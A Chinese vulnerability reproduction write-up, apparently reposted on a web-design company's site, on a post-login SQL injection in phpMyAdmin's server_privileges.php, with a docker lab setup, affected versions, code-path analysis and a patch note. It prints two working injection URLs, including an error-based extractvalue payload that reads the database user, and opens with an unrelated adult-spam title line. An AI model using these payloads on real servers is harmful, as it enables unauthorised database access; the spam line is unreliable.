欧美一区二区三区老妇人-欧美做爰猛烈大尺度电-99久久夜色精品国产亚洲a-亚洲福利视频一区二区

如何進行phpMyAdmin后臺SQL注入

如何進行phpMyAdmin后臺SQL注入,相信很多沒有經(jīng)驗的人對此束手無策,為此本文總結了問題出現(xiàn)的原因和解決方法,通過這篇文章希望你能解決這個問題。

成都創(chuàng)新互聯(lián)是一家專業(yè)提供萬安企業(yè)網(wǎng)站建設,專注與網(wǎng)站設計制作、成都網(wǎng)站制作H5響應式網(wǎng)站、小程序制作等業(yè)務。10年已為萬安眾多企業(yè)、政府機構等服務。創(chuàng)新互聯(lián)專業(yè)網(wǎng)站建設公司優(yōu)惠進行中。

0x01 簡介    
phpMyAdmin 是一個以PHP為基礎,以Web-Base方式架構在網(wǎng)站主機上的MySQL的數(shù)據(jù)庫管理工具,讓管理者可用Web接口管理MySQL數(shù)據(jù)庫。借由此Web接口可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑,尤其要處理大量資料的匯入及匯出更為方便。    

0x02 漏洞概述      
   

用戶界面SQL執(zhí)行語句存在可控變量,且未對可控參數(shù)進行過濾直接拼接??稍斐傻蜋嘞抻脩粼綑鄨?zhí)行SQL指令。

0x03 影響版本    
前提:已知一個用戶名密碼    
phpMyAdmin 4 < 4.9.4    
phpMyAdmin 5 < 5.0.1    

0x04 環(huán)境搭建

在線環(huán)境:      
轉發(fā)本文至朋友圈并截圖發(fā)至公眾號內(nèi)
自行搭建:
本次復現(xiàn)環(huán)境使用PhpMyAdmin4.5.0版本,使用docker搭建。      
     
git clone https://github.com/Paper-Pen/TLSHUB.gitcd TLSHUB/phpAdmin/docker-compose up -ddocker ps
     

如何進行phpMyAdmin后臺SQL注入

訪問頁面http://xx.xx.xx.xx:8001
數(shù)據(jù)庫賬號密碼root/li9hu      
環(huán)境搭建好了,可以開始進行漏洞復現(xiàn)了      

0x05 漏洞復現(xiàn)

簡單總結流程:    
頁面位置server_privileges.php;    
設置變量ajax_requests為true;    
設置變量validate_username 為真值;    
設置變量username 為我們拼接的注入語句。
   

   
構造payload:    
http://192.168.209.139:8001/server_privileges.php?ajax_requests=true&validate_username=1&username=1%27or%201=1%20--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server
   

(token和其余參數(shù)會在訪問頁面的時候自動提供)    
我們查看后端收到的數(shù)據(jù),可以看到SQL已經(jīng)成功拼接。          

如何進行phpMyAdmin后臺SQL注入

執(zhí)行完畢后程序只會告知SQL是否執(zhí)行成功,失敗會報錯,因此此處我們可以利用報錯注入。      
   

構造payload:          
http://192.168.209.139:8001/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server
   

結果如下,可以看到已經(jīng)成功執(zhí)行了我們注入的指令。    

如何進行phpMyAdmin后臺SQL注入

0x06 漏洞分析    
定位到文件libraries/server_privileges.lib.php,此處就是SQL注入存在點,username和validate_username都可控,我們往上回溯定位if所在的函數(shù)。    

如何進行phpMyAdmin后臺SQL注入

可以看到if處于PMA_getExtraDataForAjaxBehavior函數(shù)內(nèi)。下一步使用phpsotorm快捷鍵ctrl+B定位到觸發(fā)此函數(shù)的點。    

如何進行phpMyAdmin后臺SQL注入

跳轉到文件server_privileges.php可以看到$extra_data觸發(fā)了此函數(shù),處于一個if內(nèi),下一步快捷鍵ctrl+shift+F全局搜索變量is_ajax_request,看看是否可控讓其為真值。    

如何進行phpMyAdmin后臺SQL注入

跳轉到文件libraries/common.inc.php這里有可控變量ajax_request只要給它附true就可以返回true了。    

如何進行phpMyAdmin后臺SQL注入


0x07 修復方式

更新官方最新補丁

看完上述內(nèi)容,你們掌握如何進行phpMyAdmin后臺SQL注入的方法了嗎?如果還想學到更多技能或想了解更多相關內(nèi)容,歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝各位的閱讀!

本文標題:如何進行phpMyAdmin后臺SQL注入
分享鏈接:http://chinadenli.net/article42/gddsec.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供外貿(mào)網(wǎng)站建設小程序開發(fā)、服務器托管響應式網(wǎng)站、微信小程序

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉載內(nèi)容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)

營銷型網(wǎng)站建設